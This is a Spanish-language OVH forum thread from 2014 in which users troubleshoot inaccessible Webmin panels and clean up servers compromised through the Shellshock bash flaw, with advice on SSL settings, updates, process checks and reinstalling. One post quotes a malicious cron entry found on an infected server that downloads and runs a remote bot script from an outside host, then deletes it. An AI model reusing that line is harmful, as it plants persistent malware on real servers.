OVH Community, your new community space.

Imposible acceder a webmin


isaaclg
16/11/2014, 19:41
Me quedare tranquilo, por el momento parece que todo va bien, menos mal

Muchas gracias

mgsalinero
16/11/2014, 11:51
Genial, he estado mirando un poquillo y el problema del cambio de hora en webmin puede deberse a un bug en perl, no te lo se asegurar la verdad. Pero yo estaría tranquilo en el aspecto de seguridad.

Un saludo. ya nos contarás

isaaclg
16/11/2014, 11:25
Hola !

Si, desde consola tambien se cambiarla, pero siempre lo hacia desde webmin y al no funcionar ahora de repente despues de los ataques me resulto curioso, mas que nada por seguiridad, a saber que tocaron con el hackeo.

La cambiare por comando y ya esta, no hace falta que investigues nada, tranquilo

A ver si en un tiempo formateo los 2 servers, incluso creo que aprovechare para cambiar uno de ellos que tiene ya bastante tiempo y ahora hay cosas muchisimo mejores mas baratas.

Saludos

mgsalinero
16/11/2014, 11:06
Hola de nuevo,

La aplicación la dejaré hasta que no tenga espacio. Respecto a lo de la hora puedes cambiarla a través de la consola (ssh, webmin: Otros/Comandos de consola):
date --set "2014-01-27 17:27"
El error que te lanza a mi también me pasaba con el webmin que tenía en la release2 antes. Además la hora en ese sistema la tenía que cambiar cada dos por tres porque se resetaba al reiniciar el sistema, puede ser un bug del webmin o de la release o que algo hayamos hecho mal. Igualmente lo investigo.

isaaclg
15/11/2014, 18:20
Hola otra vez.

No te habia respondido antes porque no me aviso de que habian habido respuestas en este tema, no se porque.

Ya me baje la aplicacion puedes eliminarla de tu dropbox. A ver si esta semana la pruebo.

Otra cosilla en la que me acabo de fijar. La hora de uno de mis servers esta mal despues del ataque. Fui a cambiarla desde webmin, desde la opcion "Hardware/Hora de sistema" al hacer click, se queda cargando un rato y muestra el error tipico de que la pagina no esta disponible. Tienes idea de porque? Creo haber leido que con este ataque se tocaban cosas tambien de la fecha.

Saludos

mgsalinero
13/11/2014, 17:41
Vale me da problemas para enviarte la aplicación a tu correo. No lo consigo. Voy a buscar otra solución.

Ya la tengo:
https://www.dropbox.com/s/ws33wvyk2rx1rw0/SM.zip?dl=0

este es el programa que te decía, el programa se conecta a tu servidor mediante SSH y ejecuta los comandos "ps" (para ver los procesos) y netstats (para ver las conexiones) puedes cerrar los procesos que quieras. La lista de procesos y conexiones se actualiza cada 1200000 milisegundos y si un proceso supera un límite de CPU o memoria te saltará un aviso. Igualmente, si una IP tiene demasiadas conexiones abiertas también te lo alertará.

Esta aplicación es un poquito cutre ya que la hice rápido para monitorizar nuestros servidor cuando estaba siendo atacado. Pero viene bien para ver si te atacan con un DDOS o un ataque de fuerza bruta o incluso ataque al SMTP para mandar spam.

adjunto dos cosas en ese zip.
- Release.zip:
Contiene solamente la aplicación ServerMonitorer.exe, unas dlls necesarias para su funcionamiento y un fichero "conexion.txt"

En el fichero conexion.txt deberás introducir IP de tu server, un usuario con permisos para ejecutar comandos mediante SSH (root o cualquier otro usuario que añadas) y la password de ese usuario

- Source.zip:
Como se que eso de meter usuarios y contraseñas en aplicaciones desconocidas es un riesgo te adjunto el código fuente de la aplicación. Esta escrito en Visual Basic.Net, puedes verlo y compilarlo con VisualbasicExpress que lo puedes bajar gratis.

Así, si no estás seguro de la aplicación la puedes revisar y compilar tu mismo y así te quedas más tranquilo.

Si tienes cualquier duda dímelo, vale?
Un saludo
------------------
PD: tengo poco espacio en el dropbox osea que no lo mantendré mucho tiempo, cuando lo descargues, si lo quieres, guardalo bien :-)

mgsalinero
13/11/2014, 17:37
Te ha tenido que llegar. Si tienes algún problema avisame.

Si alguno más quiere esta aplicación que me envíe un mensaje al correo electrónico.

mgsalinero
13/11/2014, 09:07
Lo tengo, genial!

Esta tarde, cuando llegue a casa te la envío.
Un saludo

isaaclg
13/11/2014, 09:02
Te acabo de enviar el email

mgsalinero
13/11/2014, 07:19
Los procesos parecen estar bien, si ya has pasado las pruebas del shellshock no deberías preocuparte por esa parte.

El siguiente paso sería comprobar las conexiones que tienes normalmente a tu server y ver si hay alguna anomalía. Si me envías un correo a mi email (lo tienes en mi perfil) te puedo enviar una pequeña aplicación que hice para un server que monitoriza las conexiones y los procesos que tienes en tu server y te alerta de alguna anomalía.

Un saludo

isaaclg
12/11/2014, 16:30
Hola otra vez mgsalinero

Acaban de reactivarme el server infectado, aunque no me han asegurado que estuviera limpio al 100%.
He visto todavia en un par de tareas del cron que se seguia ejecutando la siguiente linea:

@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh; >/dev/null 2>&1
Las elimine, pero estoy revisando que no haya nada infectado o que mi server pueda volver a ser hackeado mediante este metodo.

Estos son los procesos que tengo corriendo, son los normales?

serv01 cron.d # pstree
init-+-6*[agetty]
|-clamd---{clamd}
|-collectd
|-courierlogger---authdaemond---5*[authdaemond]
|-courierlogger
|-courierlogger---sqwebmaild
|-couriertcpd
|-cron
|-freshclam
|-httpd---11*[httpd]
|-lfd
|-miniserv.pl
|-3*[multilog]
|-mysqld---6*[{mysqld}]
|-named
|-proftpd
|-qmail-send-+-2*[qmail-clean]
| |-qmail-lspawn
| |-qmail-rspawn---qmail-remote
| `-qmail-todo
|-spamd---2*[spamd]
|-5*[sqwebmaild]
|-syslog-ng
|-3*[tai64n]
|-2*[tcpserver]
|-udevd
`-watchdog
He pasado los comandos de https://shellshocker.net/ y tampoco es vulnerable segun parece.
Ya se que la recomendacion es formatear y empezar de cero, pero ahora mismo no puedo hacerlo, tengo que esperar un poco.

Saludos

isaaclg
12/11/2014, 08:49
Cita Publicado inicialmente por mgsalinero
Si necesitas cualquier cosa ya sabes.. ^^

Un saludo
Muchas gracias

mgsalinero
12/11/2014, 07:21
Si necesitas cualquier cosa ya sabes.. ^^

Un saludo

isaaclg
12/11/2014, 00:46
Ya pase el script y segun parece mi server no es vulnerable, ahora esta un adminstrador revisandolo, supuestamente, para ver si lo vuelven a poner online.

Si esto ocurre pensare a ver si pasarme a centos, estuve echando un ojo por internet y recomiendan centos antes que ubuntu. Asi que lo probare a ver que tal, aunque es un poco putada para mi, este server lo usabe como email marketing y lo tenia bien optimizado con spf, dkim y domainkeys, pero bueno, tendre que empezar de cero. Seguire tus consejos y sino siempre puedo volver a la release 3 si algo sale mal o no me apaño.

Y sobre el otro server pues sigue funcionando, ahora es mal momento para hacer el cambio pero lo pensare para mas adelante.

Muchas gracias

mgsalinero
11/11/2014, 15:43
El ingles y yo no nos llevamos muy bien, pero basicamente dicen que tengo que arrancar el server en modo rescue http://guias.ovh.es/ModoRescue y despues pasar este script no? ftp://ftp.ovh.net/made-in-ovh/rescuehackcleaner.sh para intentar limpiar el server del virus.
Exacto. En esencia te dice que ejecutes un script. Un parche barato vamos... No se si se podría considerar si quiera actualización.
Como bien dices las releases de OVH estan muy bien para comenzar y probar el server, pero el problema está en que apenas puedes darles mantenimiento, actualizarlas o instalar determinado software. Para eso tendrías que reinstalar el servidor por completo.

No dice nada sobre si podria perder la informacion que tengo en el server no?
No, no se como será el script pero yo haría antes de nada una copia de seguridad.

Sinceramente veo más complicado este "parche" que una reinstalación completa. La reinstalación la puedes tener en apenas un par de horas.

Si decides reinstalar te sugiero CentOS, es mucho más ligero de Ubuntu. Aún así, si te manejas mejor con Ubuntu, adelante, es también muy buen sistema. También hay que tener en cuenta los gustos propios.

Si reinstalas el servidor y quieres seguir usando webmin porque ya lo tienes dominado:
CentOS (o RedHat): http://www.webmin.com/rpm.html
Ubuntu (o debian): http://www.webmin.com/deb.html
Ahí, desde webmin podrás instalar los servidores apache, mysql, dns, smtp, etc.. Accedes al servicio o servidor, te dirá que no está instalado y que si lo quieres instalar, lo instalas y a correr.

Además, si quieres seguir usando OVHm para instalar tus dominios: http://guide.ovh.com/OvhmInstallationModule

Si quieres instalar Postfix (smtp) , dovecot (imap/pop3) y roundcube (webmail) te dejo una guia (aunque es solo para centos): https://www.rosehosting.com/blog/mai...-centos-6-vps/

Yo reinstale hace poco el servidor y pase de la Release2 a CentOS e hice lo siguiente:
1) Instalar CentOS 6
2) Instalar webmin
3) Desde webmin instalar:
3.1) Apache
3.2) Bind
3.3) MySQL
4) Instalar correo con la guía que te he dejado (junto con su configuración de dominios)
5) Añadir servidores virtuales y usuarios a apache y al sistema
6) Añadir zonas DNS
7) Firewall
8) Alguna pincelada más.

Si necesitas cualquier cosa para instalar el parche o para reinstalar ya sabes ;-)
Un saludo

isaaclg
11/11/2014, 11:24
Hola mgsalinero

Lo de instalar la Release de ellos en principio era porque se encargaban de sacar actualizaciones para corregir fallos de seguridad y demas, pero por lo que veo no han funcionado muy bien. Asi que es posible que me plantee reinstalar el server y meter centos o quiza ubuntu que tambien lo ha tocado mucho.

Por otra parte comentarte que por fin acaban de responderme al ticket, esta madrugada, me han dicho lo siguiente:

Your server is on rescue ftp mode at the moment.

Please note that release 2 passed on deprecated.
And following to the bash fault, it is strongly recommended

to save the entire
data and reinstall the OS (release 3 for example).


But it is also possible to use a script
developed from our side, which is used to clean up what we
have
Log on hacked servers.

Similarly, I wish to inform you that it is not guaranteed
that
script cleans totally the server.

The script is available via this link:
ftp://ftp.ovh.net/made-in-ovh/rescuehackcleaner.sh

It can be used in rescue-pro mode only, it will therefore
mount the partitions beforehand, as explained in
Rescue Mode guide:
http://help.ovh.co.uk/RescueMode

The update for the Release servers 2.32 minimum
is possible like that(after mounting partitions):

for i in proc sys dev; do mount --bind /$i /mnt/$i; done
chroot /mnt
wget ftp://ftp.ovh.net/made-in-ovh/release/patch-all.sh -O
patch-all.sh; sh patch-all.sh



And for Release servers <2.32 must make update
for bash to be able to return on disc and make the rest
of security updates .
These commands update the bash via
OVH patches and put it back into the real version:

for i in proc sys dev; do mount --bind /$i /mnt/$i; done
chroot /mnt
cp /etc/ovhrelease /etc/ovhrelease.bak
echo 2.33 > /etc/ovhrelease
wget ftp://ftp.ovh.net/made-in-ovh/release/patch-all.sh -O
patch-all.sh; sh patch-all.sh
mv /etc/ovhrelease.bak /etc/ovhrelease


Finally, once you have rebooted the system,
please update with:

wget ftp://ftp.ovh.net/made-in-ovh/release/patch-all.sh -O
patch-all.sh; sh patch-all.sh
El ingles y yo no nos llevamos muy bien, pero basicamente dicen que tengo que arrancar el server en modo rescue http://guias.ovh.es/ModoRescue y despues pasar este script no? ftp://ftp.ovh.net/made-in-ovh/rescuehackcleaner.sh para intentar limpiar el server del virus.

No dice nada sobre si podria perder la informacion que tengo en el server no?

Saludos y muchas gracias

mgsalinero
11/11/2014, 07:24
Mucha suerte isaaclg.

Aunque si reinstalas quizás deberías probar CentOS, así te quitas de historias con OVH. Ahí le instalas Webmin y con webmin ya tienes facil para instalar todos lo servidores que desees desde su interfaz.

Para instalar webmin en centos u otro: http://www.webmin.com/rpm.html

Pero bueno, todo depende de lo que necesites o utilices.
Un saludo

isaaclg
10/11/2014, 20:07
Me voy quedando un poco mas tranquilo, aunque con ovh nunca te puedes quedar tranquilo. El otro server en teoria no era vulnerable, pase algun test, no todos estos porque no los conocia, y en principio no era vulnerable. De echo pregunte directamente a ovh y me respondieron diciendo que segun sus datos mi server no era vulnerable. Y de la noche a la mañana apagado, solo en modo ftp, y esperando a ver si me lo encienden para revisarlo y minimo hacer un backup mysql de mi base de datos.

Sobre lo de actualizar, en centos, debian y demas, es facilito con yum o apt-get, pero gentoo lo he tocado poco. Ademas mi server trae la Release 2 que es el sistema de ovh, por lo que creo que actualizar de esta forma no es posible.

Sobre la url que me has pasado ya la conozco, es para del patch de seguridad de ellos, ya lo ejecute hace unas semanas.
Aun asi me dijeron que la release 2 esta obsoleta, por lo que es posible que me toque formatear la maquina y reinstalar con la release 3.

Por el momento cruzo los dedos para que ovh no me putee.

Saludos y muchas gracias

mgsalinero
10/11/2014, 19:45
Hola isaaclg.

Por lo que veo los procesos son los normales en un servidor. El problema que te indica el test shellshock es el mismo de siempre, tu certificado SSL no se ha podido comprobar, es simplemente eso. No es crítico ya que la vulnerabilidad shellshock poco tiene que ver con el cifrado SSL por lo general.

Si el ha pasado todos los test y no te ha indicado "vulnerable" esta perfecto.

Y con lo de actualizar no me refiero a que reinstales el SO. Me refiero a ejecutar el comando de actualización para actualizar los paquetes que tienes instalados. En el caso de CentOS, RedHat, etc es "yum update"; en otras releases es "apt-get update", en caso de Gentoo es más engorroso creo, no lo he tocado mucho y en cuanto vi su gestor de paquetes me pasé a CentOS volando jeje.

En Gentoo creo que el comando es:
emerge -avDuN world -> Para actualizar el sistema entero
emerge -avDuN -> Actualizar un paquete
emerge -avu -> Actualización básica (no actualiza dependencias ni nada) (No te lo recomiendo)
Aún así, no te se decir con exactitud que ese sea el comando en Gentoo, creo que si pero google un poco antes si no lo sabes. A ver si algún amigo del foro o de soporte lo confirma. Igualmente aquí te dejo una guia de OVH.... no se si servirá pero bueno mira a ver http://guias.ovh.es/ReleasePatchSeguridad

isaaclg
10/11/2014, 19:11
Hola !

Antes de nada, muchas gracias por la ayuda, se agradece mucho

He entrado a https://shellshocker.net/ . Primero he ejecutado el comando curl https://shellshocker.net/shellshock_test.sh | bash y me dio el siguiente resultado:

ns22524 ~ # curl https://shellshocker.net/shellshock_test.sh | bash

curl: (60) SSL certificate problem, verify that the CA cert is OK. Details:
error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed
More details here: http://curl.haxx.se/docs/sslcerts.html

curl performs SSL certificate verification by default, using a "bundle"
of Certificate Authority (CA) public keys (CA certs). The default
bundle is named curl-ca-bundle.crt; you can specify an alternate file
using the --cacert option.
If this HTTPS server uses a certificate signed by a CA represented in
the bundle, the certificate verification probably failed due to a
problem with the certificate (it might be expired, or the name might
not match the domain name in the URL).
If you'd like to turn off curl's verification of the certificate, use
the -k (or --insecure) option.
No se muy bien que quiere decir. Luego he ido ejecutando los comandos de los posibles exploit, y parece ser que mi sistema no es vulnerable, creo.

Sobre lo de actualizar el sistema regularmente, te refieres a ejecutar el comando para que se actualice la Release 2? O ejecutar el comando para actualizar el sistema por completo?

Esta es la lista de procesos:

pstree
init-+-6*[agetty]
|-clamd---{clamd}
|-collectd
|-courierlogger---authdaemond---5*[authdaemond]
|-courierlogger
|-courierlogger---sqwebmaild
|-couriertcpd
|-cron
|-freshclam
|-httpd---31*[httpd]
|-miniserv.pl
|-3*[multilog]
|-mysqld---9*[{mysqld}]
|-named
|-proftpd
|-qmail-send-+-qmail-clean
| |-qmail-lspawn
| `-qmail-rspawn
|-spamd---2*[spamd]
|-5*[sqwebmaild]
|-syslog-ng
|-3*[tai64n]
|-2*[tcpserver]
|-udevd
`-watchdog---watchdog
Lo de webmin tampoco me preocupa demasiado, lo que me preocupa es que el server siga infectado y ovh me lo ponga en modo ftp sin avisar ni nada. No me puedo permitir el lujo del paron de tiempo que esto significa, y mas cuando ovh tarda tanto en responder a los tickets, aunque sea un tema serio como este, tardan demasiado en responder.

Saludos y muchas gracias

mgsalinero
10/11/2014, 18:23
Hola de nuevo, isaaclg

Me alegra de que ya puedas haber accedido al webmin. Si aún tienes alguna duda o temor sobre el shellshock del bash te sugiero que sigas el siguiente post: https://shellshocker.net/

Esto comprueba las 4 tipos de vulnerabilidades del bash. Igualmente te recomiendo que actualices el sistema sea vulnerable o no. Estamos acostumbrados a que en Windows lo vemos como una perdida de tiempo pero en un server es vital.

Sobre la caducidad del certificado podria ser eso, pero lo raro es que me paso a la vez en los dos servidores, y no los contrate a la vez, tienen tiempo distinto.
Date cuenta que OVH firma muchos certificados de un golpe. Puede que hayas contratado tu VPS un día 20 y el certificado haber sido firmado el día 10. A mi también me pasó exactamente lo mismo en una máquina ya que no actualicé el certificado. Me salía el mismo error que a ti, de esto ya hace tiempo.

Aún así si quieres asegurarte de que tu servidor está a salvo es facil:
1) Actualizar el sistema regularmente
2) Comprueba los puertos. Abre solo los puertos que utilices (HTTP - 80-, SMTP... etc)
* No te olvides de los puertos para el monitor de OVH y otros esenciales (http://guias.ovh.es/FireWall)
3) Comprueba netstats si alguna vez intuyes que estás siendo atacado.
4) Normalmente los ataques a servidores son contra su servidor de correo para el envío de spam. Comprueba el historial de mensajes enviados.
* Si tienes QMail (la release de OVH suele traer este): http://www.digitalvalley.com/blog/de...m-desde-qmail/

Adicionalmente puedes usar el comando "ps" para comprobar los procesos que se están ejecutando y comprobar si alguno no debería. Si posteas los procesos podremos decirte si alguno es altamente irregular.

Igualmente, tranquilo. Lo del Webmin lo he visto muchas veces. Si tu servidor estuviese hackeado probablemente el firewall de OVH hubiese detectado la situación y hubiese avisado y, en casos extremos apagado el servidor en modo FTP para que recuperes tus datos.

Y finalmente, otra acción que deberías hacer siempre que puedas son copias de seguridad regularmente de los archivos más importantes.

Un saludo y a tu disposición.

isaaclg
10/11/2014, 17:44
Perdona fallo mio, estaba intentando acceder a la URL del server que me ha apagado ovh. Lo hice con prisas porque tenia que salir y me equivoque.
Como tu dices, puedo acceder perfectamente sin https.

Sobre la caducidad del certificado podria ser eso, pero lo raro es que me paso a la vez en los dos servidores, y no los contrate a la vez, tienen tiempo distinto. Ademas el problemas este en el bash toquetea cosas de webmin, yo creo que esta mas relacionado con esto.

Alguna idea de como saber si me estan usando el server para ataques? Hice lo que pone aqui, mas o menos: http://forum.ovh.com/showthread.php?...he-cron/page22 pero por asegurarme. Tambien lo hice con el otro server y ahora esta cerrado.

Quiza con netstat para ver las conexiones salientes? No se, alguna idea?

mgsalinero
10/11/2014, 14:23
Igualmente para que esto de repente este asi, algo a tenido que pasar.
Es posible que el certificado haya caducado por eso ahora te da error y antes no.

mgsalinero
10/11/2014, 14:16
En principio la configuración está bien, excepto el "atboot" que lo tienes a 0 y quizas no te arranque el webmin al arranque del servidor, aunque probablemente tengas otro script que lo ejecute osea que no veo problemas.

He probado a entrar a la página de login de tu webmin y ya no me da ninugún error, efectivamente ya no tienes el problema del SSL. Ahora no te logearás por SSL evitando el error en el certificado. ¿Por que no puedes acceder? A mi me aparece la ventana de logeo a webmin:
Ingreso a Webmin
Debe ingresar un nombre de usuario y contraseña para ingresar al servidor Webmin en 91.121.5.73.
Nombre de usuario
Contraseña
¿Recordar el usuario en forma permanente?
No puedes entrar al webmin porque no te coge el usuario o por que tienes algún problema y ni te aparece el login?

isaaclg
10/11/2014, 12:22
Lo de Chrome si lo habia visto, se me olvido comentartelo en el anterior mensaje. Igualmente para que esto de repente este asi, algo a tenido que pasar. En mi otro server le paso lo mismo a webmin y a los 3 dias mas o menos ovh lo apaga. A ver si evito que haga lo mismo con este.

El contenido de miniserv.conf

port=10000
addtype_cgi=internal/cgi
realm=Webmin Server
logfile=//var/log/webmin/miniserv.log
errorlog=//var/log/webmin/miniserv.error
pidfile=//var/run/webmin.pid
logtime=168
ppath=
ssl=1
env_WEBMIN_CONFIG=//etc/webmin
env_WEBMIN_VAR=//var/log/webmin
atboot=0
logout=//etc/webmin/logout-flag
listen=10000
denyfile=\.pl$
log=1
blockhost_failures=5
blockhost_time=60
syslog=1
session=1
userfile=//etc/webmin/miniserv.users
keyfile=//etc/webmin/miniserv.pem
passwd_file=/etc/shadow
passwd_uindex=0
passwd_pindex=1
passwd_cindex=2
passwd_mindex=4
passwd_mode=0
preroot=mscstyle3
passdelay=1
logouttimes=
root=/usr/libexec/webmin/
mimetypes=/usr/libexec/webmin//mime.types
server=MiniServ/1.710

Algo fuera de lo normal? a parte de la opcion ssl.

Acabo de poner la opcion en 0 y reiniciar webmin, ya no sale el error del certificado pero tampoco se puede acceder a webmin. https://91.121.5.73:10000/

Alguna idea? A parte de instalarle el certificado.

Gracias

mgsalinero
10/11/2014, 10:56
Bueno, también tienes la opción de instalarle un certificado ssl válido :-D

mgsalinero
10/11/2014, 10:54
He comprobado tu webmin. Tu webmin funciona perfectamente.
El problema lo tienes en el cerficiado SSL.

Accediendo a 91.121.5.73:10000 me sale lo siguiente:
Error - Document follows

This web server is running in SSL mode. Try the URL https://ns22524.ovh.net:10000/ instead.
Es decir, me pide que el enlace correcto a tu webmin es la ruta segura: https://ns22524.ovh.net:10000/.
Accediendo a esa ruta me indica que hay un problema con el certificado SSL (uso Google Chrome) y que no es privada la conexión. Me dice da la opción de "Volver atrás" o "Avanzadas", en "Avanzadas" me permite la opción de continuar al sitio no seguro.

En iexplore me aparece lo siguiente:
Existe un problema con el certificado de seguridad de este sitio web.

El certificado de seguridad presentado por este sitio web no es seguro.

Los problemas con los certificados de seguridad pueden indicar un intento de engañarle o de interceptar cualquier dato enviado al servidor.

Le recomendamos que cierre esta página web y no vaya a este sitio web.

# Haga clic aquí para cerrar esta página web.
¿Cómo resolver esto? Dos opciones:
1)
- Accedes al webmin con Google Chrome (que te permite acceder pese al error del certificado)
- Te dará error de certificado. Pulsas Avanzado y Continuar a la página no segura
- Vas al módulo "Webmin" y dentro "Configuración de webmin" y ahí a "Encriptación SSL" o "Cifrado SSL" (depende de tu webmin)
- Y deseleccionas la opción "No" de ¿Habilitar SSL si está disponible?
- Reinicia el servicio de Webmin

Más info: http://guias.ovh.es/printPage/ActivationSSLWebmin
2)
- Accede mediante SSH o FTP a tu máquina
- Edita el archivo /etc/webmin/miniserv.conf (puedes usar cualquier editor de textos
- Busca la línea ssl y modifícala y pon ssl=0
- Guarda el archivo
- Reinicia el servicio de Webmin
Espero que te sirva
Un saludo

isaaclg
10/11/2014, 08:52
Hola.

Todo lo que comentas sobre webmin lo hice anoche, menos mirar los logs. He mirado y en los logs de /var/log/webmin apenas hay nada, webmin.log ahora mismo esta vacio, y los comprimidos de otros dias, el ultimo, solamente tiene unas lineas de cuando actualice el cron, nada mas.

Sobre las otras pruebas todo funciona, el puerto 10000, el 80, reinicie, etc.

Que es lo mejor que puedo hacer en este caso? Actualizar el sistema completo?
A ver si consigo solucionar este problema en este server antes de que ovh me lo apague de la noche a la mañana y deje de responder los tickets, porque todavia estoy esperando a que me respondan a los de anoche....

Saludos

mgsalinero
10/11/2014, 07:17
Puedes actualizar tu sistema completo con el comando bash siguiente.

emerge --update --deep --with-bdeps=y --newuse @world
Respecto a el error de conexión al webmin te sugiero que primero sigas los pasos que comenté:
1) Comprueba que tienes abierto el puerto 10000.
2) Prueba a reiniciar el servicio de webmin
3) Comprueba que tu conexión permite acceder a puertos que no sean 80 (los proxy corporativos suelen bloquear puertos extraños)
5) Comprueba mensajes de error del log de webmin
6) Reinicia el servidor
Si no funciona se pueden ver más soluciones.

isaaclg
10/11/2014, 00:52
Hola.

Yo tambien estoy teniendo estos problemas en uno de mis servidores, el otro ovh me lo puso en modo ftp porque segun ellos esta hackeado, para que saque mi informacion...

En fin, pero tengo otro server en pie, el cual yo creia haberlo limpiado, pero de repente no puedo acceder a webmin, el mensaje que aparece es el siguiente:

Conexión segura fallida
Ha ocurrido un error durante una conexión a 91.121.5.73:10000. La clave no admite la operación solicitada. (Código de error: sec_error_invalid_key)


Estoy intentando arreglarlo pero no hay manera. En la release 2 se puede actualizar bash de alguna forma ? El patch de seguridad de ovh ya lo aplique.

Saludos

Guiller
06/11/2014, 11:16
Gracias a todos.

Al final lo solucione, algo estaba mal con el puerto de webmin.

Y ya de paso probe lo del script que comentaba en el otro hilo PedroSG y me salio que era seguro.

mgsalinero
28/10/2014, 07:18
Hola PedroSG,

en nuestro VPS teníamos instalada la release Gentoo de OVH. Pero debido a muchos problemas de seguridad, soporte y mantenimiento decidimos cambiar a CentOS. La verdad es que nos va muy bien y la actualización del Bash salio mucho antes de que se popularizara el problema. Cuando vi el tema del bash hice la prueba para comprobar si tenía la vulnerabilidad y efectivamente no, estaba perfectamente parcheado.

Si sigues encontrando problemas, quizás lo mejor sería realizar copias de seguridad, limpiar copias de seguridad y realizar una reinstalación completa y el cambio de release o de OS.

Si te puedo echar una mano ya sabes donde estamos
Un saludo

PedroSG
27/10/2014, 16:18
Buenas mgsalinero, gracias por tus consejos.

La cuestión es que esas son las cosas que había hecho, y creía que tenía el sistema ya limpio y seguro, pero hoy me vuelvo a encontrar los dos servidores nuevamente infectados con el bot de denegación de servicio

He visto que ya la release 2 de OVH no se puede elegir en los servidores nuevos, así que viendo que es cuestión de tiempo que no pueda utilizarla, prefiero ir optando ya por un cambio y así no me pilla desprevenido.

Saludos!

mgsalinero
24/10/2014, 10:57
Hola PedroSG,

afortunadamente con actualizar el bash y limpiar el sistema no tendrás problemas. Los objetivos más comunes suelen ser tareas cron, procesos y cambios en los usuarios y permisos y el arranque del sistema (rc.d o init.d). Eso es lo primero que revisar.

Un saludo

PedroSG
24/10/2014, 10:20
Hola mgsalinero,

Gracias por la información, ahora que conozco el nombre de la vulnerabilidad he podido localizar más información, y efectivamente salió publicado en muchos sitios, pero tengo que reconocer que en su día no me enteré o no le presté atención... por lo que leo, habiendo estado comprometido -en mi caso uno de los servidores se infectó con el cliente de denegación de servicio, y el otro con ese y con el pagezero/bufdaemon colado en el arranque del webmin- dedicaré el fin de semana a sacar copia de seguridad de mis proyectos y a reinstalar por completo los servidores.

Gracias, un saludo!

mgsalinero
24/10/2014, 07:20
Si, es posible de la vulnerabilidad del bash. Actualizar vuestro sistema, comprobar el cron y el arranque del servidor.

Igualmente, PedroSG, hace ya tiempo que se venía advirtiendo que esta vulnerabilidad existía y era una vulnerabilidad crítica. En este foro ya se advirtió y se indico como comprobar si era seguro vuestro sistema. Espero que no hayais perdido datos, ni os hayan robado nada y todo haya quedado en una denegación de servicio.

Un saludo

PedroSG
23/10/2014, 18:03
Hola, yo estuve con ese problema hasta ayer, lo explico en otro post, si usas la release 2 de OVH puede que también sea tu caso...

http://foros.ovh.es/showthread.php?1...en-su-servidor

Saludos!

mgsalinero
21/10/2014, 15:37
1) Comprueba que tienes abierto el puerto 10000.
2) Prueba a reiniciar el servicio de webmin
3) Comprueba que tu conexión permite acceder a puertos que no sean 80 (los proxy corporativos suelen bloquear puertos extraños)
5) Comprueba mensajes de error del log de webmin
6) Reinicia el servidor

Guiller
21/10/2014, 14:37
Hacia tiempo que no accedía al panel webmin de mi servidor, pero hoy he ido a hacerlo y resulta que no me responde.

Vamos, que no aparece la pantalla de login.

Por linea de comando, he comprobado que el servicio esta arrancado.

¿Alguna idea de que puede ser o por donde puedo tirar?